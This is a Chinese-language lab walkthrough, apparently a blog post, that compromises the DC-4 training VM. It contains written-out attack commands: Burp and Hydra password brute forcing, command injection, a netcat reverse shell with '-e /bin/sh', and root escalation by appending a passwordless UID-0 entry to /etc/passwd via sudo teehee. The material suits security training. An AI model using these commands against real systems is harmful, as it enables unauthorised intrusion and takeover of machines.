网络安全实训第五天(主机系统渗透)

1 信息收集

  • 安装完成DC-4靶机后网络调成NAT模式,并运行

在这里插入图片描述


  • 在kali机中使用arp扫描获取靶机的IP
    命令:sudo arp-scan -l
    在这里插入图片描述

  • 根据获取到的IP打开网站

在这里插入图片描述


  • 使用nmap获取到靶机的服务和操作系统信息
    命令:sudo nmap -O -sV IP
    在这里插入图片描述

  • 使用dirsearch获取网站结构信息
    命令:sudo dirsearch -u IP

在这里插入图片描述


  • 可以使用AWVS对靶机IP进行扫描,查看相关信息

在这里插入图片描述


  • 可以查看到网站结构和漏洞信息

在这里插入图片描述


2 使用Burpsuite破解密码

  • 使用BP截获登录请求,转发到轰炸模块,高亮需要破解的内容,并设置载荷

在这里插入图片描述

  • 破解后查看报文长度判断成功状态,获取密码happy
    在这里插入图片描述

3 使用命令执行漏洞

  • 使用BP拦截Run请求,查看内容,发现执行的是radio的内容

在这里插入图片描述

  • 使用whoami查看权限

在这里插入图片描述


  • 使用pwd查看当前所在的目录

在这里插入图片描述

  • 对命令进行URL编码
    在这里插入图片描述

  • 将编码后的命令赋值给radio
    在这里插入图片描述

4 使用反弹shell技术

  • 在kali端监听1234端口
    命令:nc -lnvp 1234
    在这里插入图片描述

  • 查看kali机的IP地址
    在这里插入图片描述

  • 对命令进行编码操作
    命令:nc IP 1234 -e /bin/sh

在这里插入图片描述


  • 赋值给radio并发送建立连接
    在这里插入图片描述

  • 返回kali端查看连接状态
    在这里插入图片描述

  • 使用python建立真正的shell访问终端
    命令:python -c ‘import pty;pty.spawn(“/bin/bash”)’在这里插入图片描述


5 使用Hydra协议爆破技术

  • 进入到jim用户的backups目录下,查看到存在old-passwords.bak文件

在这里插入图片描述


  • 将bak文件下载到kali机中
    命令:python -m SimpleHTTPServer

在这里插入图片描述


  • 访问IP:8000,下载文件

在这里插入图片描述


  • 使用Hydra爆破密码
    命令:
sudo hydra -l jim -P old-passwords.bak ssh://IP -vV

在这里插入图片描述


  • 获取到jim的密码:jibril04

在这里插入图片描述


6 使用SSH登录系统

  • 使用ssh登录到jim
    命令:ssh jim@IP
    在这里插入图片描述

  • 查看用户目录下的mbox文件
    在这里插入图片描述

  • 查看/var/mail/jim文件内容获取到charles的密码:^xHhA&hvim0y

在这里插入图片描述


  • 使用su登录用户charles
    在这里插入图片描述

7 使用提权技术

  • 进入到charles用户后使用sudo查看不需要密码就可以执行的命令
    在这里插入图片描述

  • 使用命令添加用户wjr,并使用su登录
    命令:
echo ‘wjr::0:0:wjr,,,:/home/wjr:/bin/bash’ | sudo teehee -a /etc/passwd

在这里插入图片描述


  • 具体参数解释如下

在这里插入图片描述


8 获取flag值

  • 成功获取到/root文件夹中flag.txt中的内容

在这里插入图片描述

  • 9
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值